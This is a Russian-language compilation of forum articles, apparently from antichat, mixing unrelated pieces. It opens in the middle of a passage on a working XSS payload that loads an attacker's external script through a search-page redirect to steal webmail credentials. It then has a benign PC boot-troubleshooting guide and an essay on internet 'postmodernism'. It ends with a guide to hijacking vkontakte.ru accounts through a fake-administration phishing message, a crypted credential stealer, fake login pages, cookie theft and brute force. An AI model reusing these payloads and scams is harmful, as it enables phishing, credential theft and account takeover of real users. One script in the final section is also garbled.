И последнее, на чем я хотел бы сконцентрировать Ваше внимание, это скрипт

<script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"<script>

Он делает редирект на страницу http://nova.rambler.ru/search?query=< … <SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>. Что за странное значение получает переменная query? Она передает в себе скрипт

<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>

благодаря которому в код страницы с результатами поиска прописывается еще весь код файла js.js. В противном случае мы бы должны были прописывать его в ссылку сами, делая саму ссылку невероятно длинной и неудобной. То есть конструкция

<SCRIPT type="text/javascript" src="полный адрес кода"></SCRIPT>

значительно облегчает нашу работу.

4) Как защитить свой почтовый аккаунт?

Во-первых: никогда не открывайте подозрительные ссылки! Во-вторых, не читайте открытки от неизвестных Вам людей. Чаще всего в сообщениях, в которых говорится о том, что на Ваше имя пришла открытка, есть ссылка на фейковую страницу, которая сначала возьмет необходимые данные, а потом сделает редирект на страницу с открыткой, либо еще куда-то.

by DrumAndBass (dadevil)
Спасибо за помошь:rpn,evill,t1o1.

Что делать, если не грузится комп?

Автор статьи - -=lebed=- с forum.antichat.ru

[intro]

Мне надоело уже порядком отвечать на те или иные вопросы почему не грузится компьютер, поэтому я решил написать эту статью и собрать наиболее полную коллекцию причин и способов их устранения. Статья затрагивает в основном проблемы железа, т.е. когда комп не грузится совсем из-за неисправности компонентов, а не по причине неполадок ОС или проблем с загрузчиком, основана на личном 10-ти летнем опыте.

[1. Компьютер "не заводится" совсем!]

Т.е. при подаче питания не происходит ничего совсем! (ни стартуют куллеры, не горят светодиоды, отсутствует звук в динамике.)
Устранение:
Как бы не было странным, я советую проверить напряжение 220в на подходе к БП. Бывают случаи банального плохого контакта штепселей до БП, выбитого автомата из-за включенного чайника и т.д. Т.е. обязательно убедитесь тестером что на штепселе, который вставляется в БП есть напряжение 220в. (Крайние контакты - ноль и фаза, средний - земля). На современных БП есть выключатель, проверьте так же и его, редко но бывает, и на нём пропадает контакт, либо он случайно отключен.
Далее, если с питанием всё ок, открываем системник, если есть светодиод на материнке и он горит - убеждаемся что питание приходит на плату с БП.
Потом обращаем внимание на кнопку, которая должна замкнуть контакты на материнке и запустить БП. А точнее отсоединяем её и пробуем перемкнуть контакты отвёрткой прямо на материнке.(маркируются PWRSW) Кнопки как правило выходят из строя редко, но бывают западают.
Если с кнопкой всё впорядке, а комп так же не подаёт признаков жизни, то я сразу советую попробовать подставить другой БП, потому как с большой вероятностью можно утвержать что проблема в нём, при этом обязательно советую отключить все дисковые устройства.
Если всё заработало, подсоединяем (по 1 шт.) отключенные ранее устройства, выявляя проблемное. Если всё вместе работает, то либо меняем БП на новый, либо ремонтируем неисправный (обычно горят транзисторы, диоды на входе БП, тут на ачате была статья о ремонте БП)

[2. Компьютер пытается "завестись".]

Т.е. при подаче питания сразу происходит последующее отключение питания. Куллеры начинают вращатся и тут же перестают.
Возможные причины:
а) Напряжение просаживается по каким либо линиям питания (перегрузка по току) и срабатывает защита.
Вполне возможно какое либо из устройств неисправно и просаживает питание либо перегружает шины данных по току. (Недавний мой пример - cгоревшая видеокарта 8800GT - перегрузка по шине PCI-E либо по дополн. линиям питания.)
В этом случае в современных БП срабатывает защита от перегрузки и происходит отключение питания.
б) Перекос напряжений, допустим +12,8в и -11,2в или +5,5в и -4,5в (Это может быть следствие просадки - как правило наблюдается у дешовых китайских БП).
Устранение:
- Выявляем устройство причину: Отключаем все возможные устройства: HDD, CD/DVD-приводы, платы расширения, USB-хабы (даже воткнутая неисправная флешка может быть причиной). Оставляем только материнку, проц, память. Если не помогло, то снимаем и память. Если результата нет, вынимаем материнскую плату и пробуем запустить на столе, вне корпуса. Если запуск произошёл, то скорее всего на материнке есть микротрешина (часто возникает на материнках для процев AMD в районе процессорного разъёма). Как правило эту неисправность сложно устранить в домашних условиях, можно попробовать лишь погреть материнку, предварительно сняв проц, горячим воздухом паяльной станции. Кардинальное решение - замена материнки.
- Если результата нет - внимательно осмотрите плату на предмет вспухших конденсаторов обвязки (круглые бочёнки). Вывает что электролит выкипает (высыхает) и в конденсаторе сильно возрастает ток утечки (начинает работать как резистор) тем самым просаживая напряжение и не обеспечивая достаточной фильтрации. Решение - замена конденсаторов на аналогичные (можно взять с другой неисправной платы). Аккуратно - не перепутайте + и - при установке.
- Если внешне всё в порядке, то остаётся 3 возможных неисправных компонента: БП, Проц, Материнская плата.
В этом случае, я так же советую попробовать подставить другой БП, если всё заработает, то значит проблема в нём (скорее всего в выходных цепях БП), либо меняем БП, либо ремонтируем.
- Не помогло с рабочим БП - меняем проц на заведомо рабочий. (за свой 10-ти летний опыт я так и не видел сгоревшего процессора - наверно везло
- Не помогло - не исправна материнская плата - меняем.
Т.е. из четырёх, самых главных компонентов, вероятный порядок выхода из строя следующий:
1. БП (Очень часто используется дешовый некачественный китайский БП)
2. Материнская плата.
3. Память.
4. Процессор.
Тут отдельно остановлюсь на старых БП - там на входе был попросту предохранитель (иногда впаянный) который при увеличении нагрузки попросту сгорал. В этом случае перед установкой нового - так же следует найти причину (КЗ, либо перегрузки). Были случаи выхода из строя БП из-за неисправного (сгоревшего) HDD например, причём из-за него сгорело аж два БП (я так понял не имеющих защиты), так что будте аккуратнее.
в) Перегрев процессора.
Некоторые процессоры не запускаются без охлаждающего радиатора совсем (часто от AMD). Т.е. причина отскочившая защёлка радиатора, либо одного! крепления к материнской палате (был реальный случай), либо плохой термоконтакт с ним.
Устранение:
Открываем системник, проверяем радиатор, ставим на его место, если отошёл, при необходимости используем термопасту.
Вообще перегрев (не достаточное охлаждение - это отдельная тема) проверьте чтоб все радиаторы были на месте (южный и северный мост).
г) Вы используете мощную видеокарту (а может и две в SLI или Cross) и она(и) требуют отдельной(ых) линии(й) питания 12в. В этом случае БП может попросту не вытягивать эту нагрузку (потребление современных видеокарт доходит до 200Вт.) Если Вы счастливый владелец двух видюх, то наверняка Вы позаботились о мощном БП >650Вт. и этой проблемы у Вас быть не должно (такие БП имеют отдельные линии питания для видеокарт и я надеюсь Вы использовали их верно). Если у Вас одна видеокарта с доп. питанием и обычный БП (400-430Вт.) то видеокарту следует запитать двумя! свободными линиями питания (отдельные провода из БП с обычным плоским разъёмом на конце) используя специальный переходник (поставляется с видюхой). На эти линии не рекомендуется подключать параллельно ещё что-либо (HDD, CD/DVD и др.)
д) Плохой контакт на разъёме питания материнской платы (20pin, 24pin). Было и такое: Отверстия разъёма "мамы" БП были большего диаметра чем штырьки "папы" на материнке, вследствии чего из-за плохого контакта начал отгорать разъём (почернел). Неисправности такого плана, как правило выявляются ударом по системному блоку. А так же можно заметить по просадке напряжения (сопротивление в месте плохого контакта может достигать нескольких ОМ).
Устранение: Отсоединяем разъём, маленьким шилом деформируем контакты "мамы" разъёма БП, уменьшая диаметр, превращая окружность в например в пи... т.е. элипс ну вообщем вы поняли проблему Для наглядности вот так: O -> ()

[3. Заводится, нет звуков, чёрный экран]

- Тут мы уже можем померять напряжения БП тестером и убедивщись в отклонениях (или их отсутствии) более 10-15% по линиям +5В,-5В, +12В, -12В начинаем выявлять причину просадки напряжения - отсоединяем все устройства и т.д. т.е. алгоритм действий такой же как и во 2 пункте.
Вообще разница этих пунктов только в том, что один БП имеет защиту от перегрузки, другой нет, либо один БП более мощный и порог срабатывания защиты другой. Т.е. БП запускается, а напряжения для работы компонентов, устройств всё равно недостаточно из-за просадки.
- Неверные установки биос. Часто происходит, если вы пытались разогнать систему (проц, память, шины и т.д) и в итоге не может отработать даже POST (процедура самодиагностики).
Устранение: открываем системник, вытаскиваем батарейку (обычно кругляк размером с 2 рубля и напряжением 3,3В.) Перемыкаем контакты к которым цепляется батарейка на материнской плате отвёрткой на несколько секунд, тем самым сбрасывая установки BIOS в заводские. Пробуем запустить без батарейки. Потом ставим батарейку на место и пробуем грузится. Проверьте напряжение батарейки. Были случаи не запуска компа из-за севшей (осталось 1,7в) батарейки.

[4. Отрабатывает процедура POST (самодиагностики).]

Т.е. динамик компа начинает издавать некоторые звуки, хотя вывода на экран может и не быть.
Сигналы для разных BIOS и материнских плат могут отличаться, поэтому сначала смотрим по ману от материнки какой у нас BIOS, а потом смотрим расшифровку сигналов, приведу некоторые из популярных:
AMI BIOS:

2к Ошибка четности ОЗУ
3к Ошибка в первых 64 кБ ОЗУ
4к Неисправность системного таймера
5к Неисправность CPU (процессора)
6к Накрылся контроллер клавиатуры
7к Накрылась системная плата
8к Проблемы с памятью видеокарты
9к Ошибка контрольной суммы BIOS
10к Невозможна запись в CMOS
11к Неисправен кэш, расположенный на системной плате
1д+1к Проблемы с блоком питания
1д+2к Проблемы с видеокартой
1д+3к То же
1д+8к Не подключен монитор

AWARD BIOS:

2к Мелкие ошибки (как правило это проблемы в CMOS Setup или с системной платой.)
3д Ошибка контроллера клавиатуры
1д+1к Ошибки в ОЗУ
1д+2к Ошибка видеокарты
1д+3к Ошибка инициализации клавиатуры
1д+9к Ошибка при чтении из ПЗУ
к, повторяющийся Неисправен блок питания
д, повторяющийся Проблемы с ОЗУ
непрерывный Неисправен блок питания

к - короткий сигнал.
д - длинный.
На практике не всегда вообщем-то стоит доверять этим сигналам, потому как одновременно может быть две или более неисправности и тут всё зависит от того как функционирует процедура POST, т.е. какую неисправность она обнаружит сначала.

[5. Отрабатывает процедура POST - один короткий сигнал - всё ок, но негрузится]

Даже при одном коротком сигнале - (всё работает нормально) компьютер может не грузится.
Как правило это может произойти из-за не верных установок в BIOS.
Устранение: заходим в BIOS возвращаем установки обратно (если меняли перед этим) либо сбрасываем все установки в заводские (по-умолчанию).
На современных платах от Asus есть система интеллектуального разгона, которая может не совсем верно работать (выставлять напряжения и частоты) в режиме auto. Поэтому рекомендуется отключить её, выставив режимы в BIOS либо manual либо disable. Иногда стоит задать явные частоты памяти, процессора, шины и т.д. а не надеятся на режим auto. Пример: оперативная память определяющаяся как работающая на частоте 800 но на самом деле при этом не корректно работает и при этом нормально работающаяя на 667. Вообщем задавая явные верные установки, а не auto Вы увеличивайте шансы на успешную загрузку и дальнейшую стабильную работу системы.

[6. Проблемы загрузки ОC]

Остановлюсь вкраце и на этом, потому как это уже в большей степени не проблемы железа (исключение не исправный HDD, либо другое устройство загрузки).
- не исправный HDD (не определяется и т.п.)
Устранение: Грузимся с Live-CD - тестируем HDD (имхо лучшая прога MHDD4) выявляем неисправность, обычно либо контроллер, либо поверхность блинов. Как правило решение для устранения неисправности - замена HDD на исправный. Если ценна инфа на винте - можно попробовать отдать на восстановление в специализированную фирму.
- отсутсвует загрузчик, повреждена MBR и т.д.
Устранение: Грузимся с установочного диска ОС (для винды выполняем fixmbr, fixboot если стандартный загрузчик).
Если используется не стандартный мультизагрузчик - ставим его заного.
- не грузится ОС, загрузчик на месте. Это уже проблемы самой Операционной системы (повреждённые системные файлы, файлы драйверов, проблемные драйвера, вирусы и т.д.)
Устранение: Восстановление системы (различные способы), как кардинальный способ - загрузка с CD(DVD) и переустановка ОС на чистый переразбитый и отформатированный диск.

[заключение]

Конечно тут описаны не все причины проблемы не запуска компьютера, но это наиболее частые и встречаемые мной на практике, статья возможно будет дополнена и доработана. Главное определён алгоритм действий. Иногда бывает обидно разобрать весь комп и только потом выявить причину плохого контакта в розетке. Не тратьте своё время. Начинайте всегда сначала: проверьте напряжение питания (можно обойтись и без тестера, подключив к примеру, монитор к сетевому кабелю 220В, которым питается системник. Не забывайте про доп. питание проца на материнцкой плате (4 или 8 pin), дополн. питание видеокарт (6pin). Не перегружайте линии питания (запитывайте разные устройства с разных линий). Плохое питание - как правило основной источник большинства проблем с запуском компьютера, на втором месте перегрев (плохое охлаждение), далее неисправность устройств (HDD, Видеокарта, CD/DVD-приводы, память, материнка и т.д.)
P.S. спец. для Ачата из личного опыта.

Хакерский постмодернизм

Автор статьи - Cthulchu с forum.antichat.ru

Неудержался. По моему, статья очень хорошая, стоит к тому, что бы ее прочли. Детям читать бесполезно (зная, что их тут как грязи).
И так, статья:
---
Итак вначале от себя-

попрошу сразу закрыть страничку с этой темой тех,
кто не читает до конца большие статьи, и
тех, кто дает коментарии типо кг/ам, ниасилил, афтар жжот,
и прочую мутотень.Ибо никто вас не заставляет читать её,
а читать не полностью просто не имеет смысла.
Кто-то прочитав статью скажет "Очень уныло" или "Что не не верится" и.т.д
У каждого сугобо личное мнение, и переубеждать вас никто не будет.
Но от себя могу сказать- "Почитай, хорошо написанно.Очень хорошо."

- А что, она работает? – Удивилась девочка, ощупывая гильотину.
- Работает всем на радость, вот только радость эта горькая, - сказал Эко.
Стивен Эриксон «Оттенки дьявольской скуки».

Тема у нас сегодня несколько необычная, что-то вроде «писатель и самоубийство» или «воровство как акт постпанковой диалектической культуры, нашедшей своё отражение в киберпанковой реальности современной России». Ну в общем хреновая у нас тема, да к тому же опасная как боевой топор викингов, которым решил побриться автор. Так и головы лишиться можно. Но не всё ж вам на форумах выклянчивать «спецов» ломануть почту любимой девушки (даю совет от себя: заломайте саму девушку, ха-ха-ха), учиться писать троянов, а так же выискивать баги в популярных программах. Пора немного и мозгами пошевелить, чтобы понять, где вы, когда вы и зачем вы. Преисполненный глубокого снобизма, я смело, как Анна Каренина, прыгаю под локомотив вашего мышления: современный интернет продукт вторичной пользы, опасный и требующий немедленной реструктуризации, а лучше государственного контроля с узаконенной смертной казнью.

Что есть по сути интернет? В первом приближении – место, где располагается, зарождается, распространяется, воспринимается, осознаётся информация, которой так много, что обыватель не в состоянии её полностью осмыслить и приходит к ошибочному выводу: «Всё уже написано, сыграно, сделано и нам остаётся лишь перерабатывать информацию созданную либо предыдущими поколениями, либо гениями-одиночками». С одной стороны то понятно, что легче воспользоваться новой версией WWWHack или переписать уже созданного Трояна (ох, чувствую я, сейчас ко мне домой начнут названивать компетентные органы) или даже скачать заплатку, патч, обновление, не разбираясь самостоятельно в проблеме. Возьмём, к примеру статью, написать которую я планирую уже год. Называется она «Как написать статью». Цитата (в духе постмодернистского самоплагиата): «Вы придумали новую статью? Блестяще! Теперь наберите её в яндексе, скачайте с неприметного ресурса, перепишите с нуля и выдайте за свою. Потому что всё, что вы придумали, за редчайшим исключением (которое следует расценивать как золото, найденное в канализации – не могу не плюнуть в лицо сетевым эстетам и скажу, что у меня таких статей аж на 10 % от всех работ наберётся), давно написано, разобрано по полочкам, украдено и ещё раз переписано. Остаётся только добавить свою лепту в тепловое нагревание вселенной и информационный хаос. Впрочем, может и у вас появится последователь, который совместит вашу статью с диссертацией по молекулярным фракталам и родит хоть что-то относительно новое под этой безумной луной».

Интернетовский плагиат – это ещё бог с ним, пусть замшелые профессионалы с ним борются: «Я, мля, эстет! Какого чёрта вы опубликовали мою статью о новой версии антивируса К у себя на портале! Вы позора не вынесите, если ссылку на мою домашнюю страничку «Я и моя странная кошка» не сделаете. Горите в аду!» Гораздо страшнее, когда эта зараза проникает в мозг и порождает самоплагиат. (Тут автор ушёл в подпространственные рассуждения о литературе вообще и месте современного человека в иерархии космологических сил в частности, но мощное телепатическое вмешательство редакции повернуло его на правильный путь.)

<…>Возьмём таких писателей как Лукьяненко, Донцова, Пелевин. Не во всех романах (Иисус из Назарета упаси меня такое сказать), но во многих из декораций только имена героев поменялись. Словно под копирку писали. Не говоря уже о том, что большинство героев большинства произведений мыслят одинаково и точно так же как и автор. Оставим литературу, я, мля, не эстет и не критик. Посмотрим на софт. Вы видели Office 12? Я видел. Аккуратно поменяли дизайн и оставили все те же функции. Впрочем, чего ещё нового там придумать и я не знаю. Но возьмите Windows Vista! Так грамотно своровать идеи у Linux и Mac OS мог только Гейтс! Там же практического ничего нового нет, всё, до последней строчки кода, либо существует в других системах, либо давно выпущено сторонними разработчиками. И при этом они уже пять лет делают эту систему, выкинув действительно свой проект Windows Blackcomb-Vienna за орбиту 2010 года. Или вот с пеной у рта ожидаемая PS3 (каюсь, даже я коплю на неё денежки, прельстившись блю-рей приводом). Не помню сколько там у неё терафлопс производительности, этакий маленький суперкомпьютер. Ну реализовали они там технологию 1999 года, запихав восемь ядер. Но это устаревшая технология! Она даёт чисто физический прирост производительности, обеспечивая грамотную прорисовку и фантастическую графику. И всё. На AI в новых играх не надейтесь. Да хоть тысячу процессоров они туда поставят и сделают виртуальную реальность – противник всё равно не додумается сменить оружие, обойти вас сзади и подстроить хитроумную ловушку. Зато игроделы будут развивать он-лайн гейминг. Ну да, чего тратиться, когда можно человека поставить против человека и сэкономить пару миллиардов на разработку удовлетворительного геймплея.

Я не знаю, что это, жадность или лень. Всё ж проще двигать давно апробированные старые технологии, чем развивать новые. Примеров можно привести огромное количество, но по большому ИМХО не малую роль в отупении сознания сыграл интернет. Чёрт, столько информации! И всё бесплатно. Зачем нам выискивать какие-то проги, читать какие-то обзоры, когда можно скачать из P2P вторую бету Висты и наслаждаться вместе с тысячами других дурачков.

И всё это – постмодернизм.

Я не роняю крокодильи слёзы по поводу нарушения авторских прав или из-за прочей фигни. Просто мне кажется, что наша жизнь могла бы быть чуточку лучше. Хотя бы не столь походить на киберпанк, как это происходит сейчас. Знаете, если вы хотите писать компьютерные статьи (И если вы не из племени полубогов профессионалов, которые с маниакальным упорством описывают выход «новых» материнских плат и версий программ), то вам следует отказаться от интернета. Изучить какую-либо систему можно, лишь оказавшись вне её пределов, и именно так была рождена концепция Web 2.0.

Впрочем, это всё частности, на практике пользователи имеют дела с другими последствиями интернетовского постмодернизма. Поясню цитатой (автор смеётся и делает ещё одну затяжку): «Реклама и спонсорство всегда были замешены на использовании образного ряда для создания ассоциативной связи товаров с позитивными культурными или социальными событиями. Брэндинг же образца 90-х годов замечателен тем, что все более стремится вывести эти ассоциации из разряда предметно-изобразительных средств и сделать их переживаемой, проживаемой реальностью. Иными словами, когда кроссовки ассоциируются со свободой, уверенность в своих силах - с дезодорантом, а хороший вкус - с сотовым телефоном, это только цветочки. Заветная ягодка брэндинга - добиться того, чтобы свобода ассоциировалась с кроссовками; в идеале - до такой степени, чтобы в учебниках истории вместо национально-освободительной обозначилась национально-кроссовочная борьба».

Улавливаете, к чему я клоню? Мода постмодернизма – это iPod, который давно уже перестал быть плеером и перехватил инициативу у сотовых телефонов. Давайте не будем делать хороший плеер (вспомнил, что только что писал про ай-под, заглянул в одну из статей – вы её увидите чуть позже – и увидел, что да, так и есть, я сознался в покупке 20 Gb iPoda. «Деймос©, ну ты и мудак!» - подумал я... поскольку настоящей хороший плеер iRiver – уже об этом упоминал на страницах Х и получал кучу гневных откликов, мол, фигня это, но своего мнения не изменил, так что выбирайте сами, - а Яблочники не более чем раскрученный бренд в красивой упаковке. И опять таки нам легче принять то, что мы уже и так знали. Повторяйте за мной как зомби: «Фирма Apple позволяет нам думать иначе, фирма Apple – лучшая фирма, а её продукция это то – для чего мы созданы».

Творческий поиск сменился на творческую же модернизацию. Вы думаете, почему у Microsoft менеджеров больше чем программистов – они это уловили одними из первых. Не важно содержание, важен внешний лоск. Постмодернизм здесь такой необъятный, что накрывает даже наших любимых подонков. Правильно, смысл то тот же – употребление наркотиков, сексуальные взаимоотношения, общение с друзьями и алкоголем и т. д. – но поданный в необычной обёртке: ф фас йа фтыкал, та многа букаф, асилить креатифф не в силах. Так что радуйтесь, написав «аффтор жжот» вы автоматически встали с мировыми брендами в один ряд и примкнули к многочисленным постмодернистам нашей эпохи.

А что в итоге? – спросит терпеливый читатель и получит ногой по почкам за ПМ вопрос. Нет никакого «итога», есть процесс, движение PN-порядка, который несёт в себе интеллектуальная смерть, большие затраты, компьютерный багги и прочие ужасы глобальной жизни. Да если бы не этот постмодернизм, хакеры давно бы научились шевелить собственными мозгами и правили бы миром (это я примазываюсь на всякий случай – вдруг и правду интернет захватят, так я покажу им статью и выделю себе в личное княжество какой-нибудь пиндосстан).

Претендуя на полную объективность, я, скрипя сердцем и зубами, поведаю положительную сторону постмодернизма. Безвкусный и нарочитый стёб, засилье брендов и моды, стереотипность мышления, плагиат и сознательное издевательство над необъятным космосом – это очень удобно. Дальше пойдут цитаты, уж простите, но более ёмко и лаконично я сказать и мог бы, но мне лень! (Автор хохочет, затем лезет под стол и ищет потерявшуюся плюшку.) Так вот, на поверку жизнь в постмодерне оказывается банальной пубертатной сублимацией. Поясню, в чем дело. «В определенном возрасте дети испытывают непреодолимое желание выделиться из общей массы любыми правдами и неправдами. Так называемый синдром «Доживем до понедельника» — когда «все вы толстокожие дураки», «меня, тонкого, не понимаете» и «тьфу на вас». Теперь поясню цитату, а так же расскажу, в чём она не права: стремление выделиться может проявляться в нестандартном поведение, отсюда и ноги растут у «подонков», выбор художественного языка которых целиком определяется принципом постмодернистского эпатажа. Лечение: кризисы переходного возраста проходят в основном у всех, и даже Удав сейчас приторговывает в открытом на его же сайте магазине. Моду надо эксплуатировать! Эксплуатировать согласно обратному «эффекту большинства», когда люди, чувствуя душевную опустошённость, стремятся стать «такими как все», ощутить себя частью единого могучего организма. То есть «аффтор», который к своим статьям получал комментарии «кг/ам», с гораздой больше вероятностью купит майку с надписью «Generation НАХ..» чем его более успешные коллеги. Неудачники ищут чем заполнить душевную пустоту.

Под ваши одобрительные вопли сделаю ещё одну цитату, на этот раз маргинального Даниила Шеповалова: «Меня читают одни неудачники». Именно эта фраза натолкнула меня на мысль, что постмодернизм завязан на самом себе: создаётся вторичный продукт, который пытается заполнить душевную пустоту потребителя, однако пустота эта может заполниться только собственными мысли, коих не наблюдается по причине присутствия мыслей чужих. А спрос рождает предложение! Очень удобно разграничить «удачливых» и «неудачливых»: писатель (пусть даже воинствующий графоман), программист, бизнесмен – успешен сам по себе, вне зависимости от качества продукта. А вот конечный потребителей становится в нашей системе в позу «зю», широко раздвигает ягодицы, и, ну, не важно. Вот Билл Гейтс – это успех. А системный администратор – лох последний, поскольку всё, что он производит, ограничивается головной болью у начальства и подчинённых.
Конечно, я описал гротескную больную систему, которая, тем не менее, живо соответствует нашему обществу, построенному на использовании «неудачников», потребляющих полнофункциональное дерьмо. Кстати, по поводу упомянутого графоманства. Я порылся в сети, посидел в библиотеке и собранные материалы применил к себе и всей IT-индустрии, выискивая следы этой опасной болезни. И с удивлением обнаружил, что в 90 % случаев я – больной графоман с манией величая, плохим слогом, отвратительным вкусом, дешёвым самомнением, нулевой профессиональностью и полной творческой бездарностью. Я не эстет, мля! От самоубийства карандашом прямо там, в библиотеке меня удержали оставшиеся 10 % процентов, в коих и жила настоящая сила. Ну то есть, если отбросить весь плагиат, раздутые водой статьи (гонорары у сетевых писателей маленькие – кстати, да! – а лень великая и большая и голодом её не победить), бессмысленные описания всем известных вещей и концептуальную лживую ересь (ну почти не употребляю я наркотики и не хочу, чтобы человечество вымерло – с кем же тогда трахаться), останется то, ради чего вы тратите своё время. Информация, которая позволяет людям мыслить.

И эта информация говорит, что в 90 % существующей в интернете информации не нуждаются 90 % пользователей. В интернете почти невозможно изобрести что-то новое плюс вы будете обречены на цитирование даже в «новом». Цитата (сатанинский хохот): «Эту галиматью заклеймил вождь пролетариата В. И. Ленин, отметив неуемное стремление каждой амебы оставить хоть какой-то след в жизни». А в IT так и вовсе страшно становится: все дружны как никогда. Если пишет иксбит про хороший антивирус, то секьюритилаб о нём пишет и Алекс Экслер и мальчик Вова под псевдонимом КулХакер. А то что «хороший» жрёт 90 % системных ресурсов и кричит как недорезанная свинья, да и вирусы не все ловит – это как-то побоку. Причём о западных антивирях мы тактично умолчим. Почему в сети одна единственная мысль становится одинаковой для всех? В лучшем случае появляется ровно 50 % антиподов. И никогда мы не ищем третью сторону, никогда не высказываем, что лучше, а в большинстве случаев и не формулируем такую мысль. Что лучше: яндекс или рамблер – гугл! Какая система хуже: линукс или виндоус – обе! Пользователь интернета максимум на что способен: выбрать из двух зол меньшее, но всем знакомое.

И тут я, почтенно поправив очки, должен важно заявить: читайте только хакер и мы покажем вам не два зла, но одно добро. К чёрту! Да не фига вы не знаете про GoogleOS, Bitdefender, Graphical Password, закупкам на eBay и Amazon, открытие правильного порно-портала и дзен-буддизме компьютерных технологий. Вы уже просто не замечаете той жизни, в которой живёте. Легко обвинять авторов, программистов, хакеров в том, что «их мышление им удобно», «они плохие, потому что плохие» и «давайте их всех казним, они нам надоели», но не в большей ли степени это соответствует вам? Не надо искать виноватых в том, что компьютеры стоят дорого, вирусы – гады, а писателям нечего писать. Вы сами своей пустотой и своим мышлением создали наш весёлый постмодернизм. Вот и живите со своими бесконечными необъятными компьютерными проблемами, которые никто не спешит решать. Гейтсу плевать. Хакерам тоже. Они не враги вашему мышлению, но и не друзья, скорее, иное измерение, до которого вам не допрыгнуть. Всё же эта статья написана именно для вас, пользователей бескрайнего рунета. Потому что кто-то должен покончить с этим мрачным киберпанком «лучших» и «худших»: страна у нас пока одна и интернет тоже, и я точно такой же пользователей продукцией, как и вы и уж тем более не всезнающий бог. И мне очень хочется узнать, чем же меня кормят.

Деймос Стренталл
---
я ее прочел и скопировал отседова:
(с) __tp://soc-engineer.ru/showthread.php?p=818#post818

Способы взлома аккаунтов vkontakte.ru

Автор статьи - ZiLiBoBa с forum.antichat.ru

INTRO

Статья написана для новичков и если 'гуру' начнут критиковать то я предупреждал(могот быть "оскробления" в вашь адресс)...Я любитель СИ но + я подобрал ешо некоторый интересный материал по етой теме...
Начинаем

1)Регистрируем аккаунт и переделываем его под тех.поддержку(в самом низу страницы).Далее пишем сообщение жертве:
Сообщение от Администрации.

Уважаемый\ая .

На наш сайт был нанесен удар хакерами и
некоторые базы пользователей пострадали.
Если вы хотите сохранить свой аккаунт,
то, пожалуйста, оставьте нам сообщение
с вашим email и паролем.В противном
случае ваш аккаунт будет удален безвозвратно.

Будьте внимательны, не попадайтесь на уловки мошенников!

С уважением Администрация vkontakte.ru

2)Регистрируем аккаунт противоположного пола, и просим мол попереписываться по emailам ,ну или что-то типо того, цель узнать email.Потом заходим в забыли пароль (например на майл ру или чьей фирме принадлежит домен)и пробуем взломать,если не получается то АККУРАТНО спрашиваем у жертвы.

3)Знакомимся и впихиваем пинча .Перед этим его нужно будет закриптовать, пабликовский криптор палится антитварями и чтобы этого недопустить пишем криптор сами или покупаем.

4)Делаем фейк страницы и через левую асю знакомимся с жертвой..ну и типо кидаешь ссылку чтбы посмотреть фотки…жертва будто захоит на свою страницу а пасс и email прилетают вам.(Самое главное URL сделать максимально похожий!!!)

5)Узнаем email(из выше перечисленных способов),регистрируемся на сайте типо na-s.ru и кидаем адрес картинки пользователю на мыло. Поздравляю Куки украдены.Скачиваем минибраузер или сами подставляем куки.И как всегда просим выслать пароль на мыло(это вконтакте).Только незабудьте удалить это сообщение.

6)Если вы азбираетесь в сайтостроении то можете сделать сайт напиханный пинчарой и т.п.Тоесть чтобы когда жертва перешла на сайт то троян скомуниздил пароль.

7)Брут для vkontakte.ru.Думаю описывать не стоит, всем и так понятно что это.

Небольшой + (собрано самое интересное)

Если у тебя много друзей и тебе каждый раз лень их отмечать на видео или фото то надо следовать инструкции
1)Вначале ты входишь в видео!
2)Нажимаешь отметить!
3)третий шаг там где написано http://www.vkontakte.ru/?????????ты всё удаляеш и вставляешь следующий текст!
4)java script:for(blabla=0;blabla<5000;blabla++){ var elem = document.getElementById('f'+blabla); if(elem == null) break; elem.onclick(); }
5)Удаляешь пробел между java script
6)Нажимаешь энтер и он отмечает сам
7)И пишем спасибо создателю>>http://vkontakte.ru/id20029416
8)Размести надпись которая написана после стрелочек у себя на стене(в контакте) буду очень благодарен
>>>>>>http://www.bj-chat.narod.ru от туда можно качать видео, музыку и просто сидеть в чате!!! делают видео и музыку на заказ!!!

Для просмотра закрытого профиля требуется:

Узнать ID пользователя. Делается это легко, наводим мышку на "Друзья ИМЯ". Копируем ссылку.
http://vkontakte.ru/friend.php?id=ЦИФОРКИ

ЦИФОРКИ после "id=" и есть ID профиля.
Копируем эти цифры и вставляем в нужные нам ссылки:
Пример :http://vkontakte.ru/friend.php?id="20029416"
Мы копируем то что указано в кавычках!!
Фотографии со мной:
http://vkontakte.ru/photos.php?act=user&id=ЦЫФОРКИ
Фотоальбомы:
http://vkontakte.ru/photos.php?id=ЦЫФОРКИ
Видеозаписи:
http://vkontakte.ru/video.php?id=ЦЫФОРКИ
Заметки:
http://vkontakte.ru/notes.php?id=ЦЫФОРКИ
Мнения о человеке:
http://vkontakte.ru/opinions.php?id=ЦЫФОРКИ

Для того чтобы быстро пригласить всех своих друзей в группу достаточно тока вставить текст в строку браузера(текст ниже)
javascript:function addall(){ var butt_all=” Выделить всех “;j=0;var div_s=document.getElementsByTagName(’div’);for(var i=0;i’+div_s[i].innerHTML;} }} }addall();

Женить себя на себе.
Фишка не особо полезная, но зато забавная. Для её использования лучше пользоваться браузером OPERA Заходите на страницу редактирования своего профиля: http://vkontakte.ru/profileEdit.php Выберайте семейное положение “Женат”. после этого открывайте исходный код страницы(в опере это ctrl+U). там находите html код выподающего списка и вконец вставляете себя: Я Затем жмете “Применить изменения” и на странице редактирования выбираете себя в списке и сохраняйте профиль. теперь вы женаты сами на себе))) Таким же способом можно менять год рождения, учебы, службы. А если поставить какойнибудь год рождения типа 11112008 то ваш возраст будет минус 1111000.
2. Легальный способ повышения рейтинга заполняя анкету. процентное соотношение:Фотография - 25% Личная информация (увлечения) - до 20%, хитрая зависимость от того, как заполнено Вуз - 5% Школа со всеми данными…. - 20% Карьера - 10% О себе: - 10% - пол - 2% - семейное положение - 2% - дата рождения (полностью) - 2% - родной город - 2% - политические взгляды - 1% - религиозные взгляды - 1%) Места - 10% (1 место - 1%, если до 10 штук) Контактная информация - 10% мобильный телефон - 4% ICQ - 4% домашний телефон - 2%)
